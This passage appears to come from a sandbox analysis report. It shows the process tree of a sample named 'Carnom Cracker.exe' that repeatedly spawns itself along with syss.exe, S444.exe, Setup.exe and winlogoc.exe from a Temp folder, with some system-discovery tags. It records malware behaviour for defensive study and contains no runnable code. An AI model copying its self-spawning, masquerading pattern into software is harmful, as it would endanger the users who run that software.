- System Location Discovery: System Language Discovery
PID:6108
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"76⤵PID:2104
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"76⤵PID:752
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"76⤵
- Checks computer location settings
PID:5816 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"77⤵PID:5724
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"77⤵PID:3812
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"77⤵PID:556
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"77⤵PID:3352
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"77⤵
- Checks computer location settings
PID:4540 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"78⤵PID:548
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"78⤵
- System Location Discovery: System Language Discovery
PID:4636
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"78⤵PID:1432
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"78⤵PID:5192
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"78⤵
- Checks computer location settings
PID:5440 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"79⤵PID:5724
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"79⤵PID:5920
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"79⤵PID:1840
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"79⤵PID:2932
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"79⤵
- Checks computer location settings
PID:3976 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"80⤵PID:5652
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"80⤵PID:548
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"80⤵PID:2320
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"80⤵PID:5424
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"80⤵PID:5560
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"81⤵PID:5472
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"81⤵PID:4372
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"81⤵PID:2944
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"81⤵PID:732
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"81⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2108 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"82⤵PID:5168
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"82⤵PID:5980
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"82⤵PID:5676
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"82⤵PID:3112
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"82⤵
- Checks computer location settings
PID:5492 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"83⤵PID:5708
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"83⤵
- System Location Discovery: System Language Discovery
PID:1972
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"83⤵PID:3080
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"83⤵PID:4088
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"83⤵PID:5236
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"84⤵PID:3248
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"84⤵PID:4568
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"84⤵PID:1776
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"84⤵PID:5720
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"84⤵PID:5760
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"85⤵PID:5496
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"85⤵PID:5144
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"85⤵PID:4024
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"85⤵PID:5704
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"85⤵PID:3976
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"86⤵PID:5352
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"86⤵PID:5712
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"86⤵PID:3068
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"86⤵PID:6116
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"86⤵PID:4368
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"87⤵PID:3476
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"87⤵PID:3696
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"87⤵PID:5832
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"87⤵PID:2424
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"87⤵PID:5172
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"88⤵PID:2180
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"88⤵PID:3608
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"88⤵PID:5888
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"88⤵PID:988
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"88⤵PID:3428
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"89⤵PID:2760
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"89⤵PID:2624
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"89⤵PID:5580
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"89⤵PID:2580
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"89⤵PID:5600
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"90⤵PID:5004
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"90⤵PID:1680
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"90⤵PID:1228
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"90⤵PID:5660
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"90⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"91⤵PID:2012
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"91⤵PID:5160
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"91⤵PID:5036
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"91⤵PID:4844
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"91⤵PID:2944
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"92⤵PID:4284
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"92⤵PID:6108
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"92⤵PID:5004
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"92⤵PID:5740
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"92⤵PID:4040
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"93⤵PID:5884
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"93⤵PID:3812
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"93⤵PID:1332
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"93⤵PID:3080
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"93⤵PID:5044
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"94⤵PID:4176
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"94⤵PID:2768
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"94⤵PID:4776
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"94⤵PID:4756
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"94⤵PID:6076
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"95⤵PID:5488
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"95⤵PID:5796
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"95⤵PID:2224
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"95⤵PID:5436
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"95⤵PID:2080
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"96⤵PID:5264
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"96⤵PID:452
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"96⤵PID:5692
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"96⤵PID:4832
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"96⤵PID:1884
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"97⤵PID:3332
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"97⤵PID:1084
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"97⤵PID:4372
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"97⤵PID:3044
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"97⤵PID:2204
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"98⤵PID:5480
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"98⤵PID:6124
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"98⤵PID:5932
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"98⤵PID:5980
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"98⤵PID:2552
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"99⤵PID:5716
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"99⤵PID:5752
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"99⤵PID:4760
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"99⤵PID:1036
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"99⤵PID:2668
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"100⤵PID:3236
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"100⤵PID:5580
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"100⤵PID:1436
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"100⤵PID:5288
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"100⤵PID:4416
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"101⤵PID:5232
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"101⤵PID:1608
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"101⤵PID:5968
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"101⤵PID:3992
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"101⤵PID:2580
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"102⤵PID:4028
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"102⤵PID:5252
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"102⤵PID:4120
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"102⤵PID:5232
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"102⤵PID:5236
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"103⤵PID:4916
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"103⤵PID:5716
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"103⤵PID:4416
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"103⤵PID:2108
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"103⤵PID:5584
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"104⤵PID:5804
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"104⤵PID:6016
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"104⤵PID:1324
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"104⤵PID:2432
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"104⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"105⤵PID:5700
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"105⤵PID:2616
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"105⤵PID:5380
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"105⤵PID:5336
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"105⤵PID:6076
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"106⤵PID:2944
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"106⤵PID:5616
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"106⤵PID:1624
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"106⤵PID:5172
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"106⤵PID:4740
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"107⤵PID:2652
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"107⤵PID:1560
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"107⤵PID:4852
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"107⤵PID:4776
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"107⤵PID:5864
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"108⤵PID:5692
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"108⤵PID:6064
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"108⤵PID:4832
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"108⤵PID:5008
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"108⤵PID:1540
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"109⤵PID:5084
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"109⤵PID:4760
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"109⤵PID:1280
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"109⤵PID:5448
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"109⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"110⤵PID:4740
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"110⤵PID:1648
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"110⤵PID:5484
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"110⤵PID:6128
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"110⤵PID:5600
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"111⤵PID:5892
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"111⤵PID:224
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"111⤵PID:3092
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"111⤵PID:5516
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"111⤵PID:5704
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"112⤵PID:5392
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"112⤵PID:3832
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"112⤵PID:320
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"112⤵PID:5604
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"112⤵PID:2288
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"113⤵PID:1432
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"113⤵PID:5480
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"113⤵PID:3796
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"113⤵PID:6076
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"113⤵PID:4928
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"114⤵PID:5612
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"114⤵PID:3256
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"114⤵PID:2176
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"114⤵PID:2944
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"114⤵PID:2860
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"115⤵PID:2368
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"115⤵PID:3716
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"115⤵PID:5816
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"115⤵PID:532
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"115⤵PID:5724
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"116⤵PID:5440
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"116⤵PID:2288
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"116⤵PID:1228
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"116⤵PID:5888
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"116⤵PID:3556
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"117⤵PID:1712
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"117⤵PID:1776
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"117⤵PID:1540
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"117⤵PID:5096
-
-
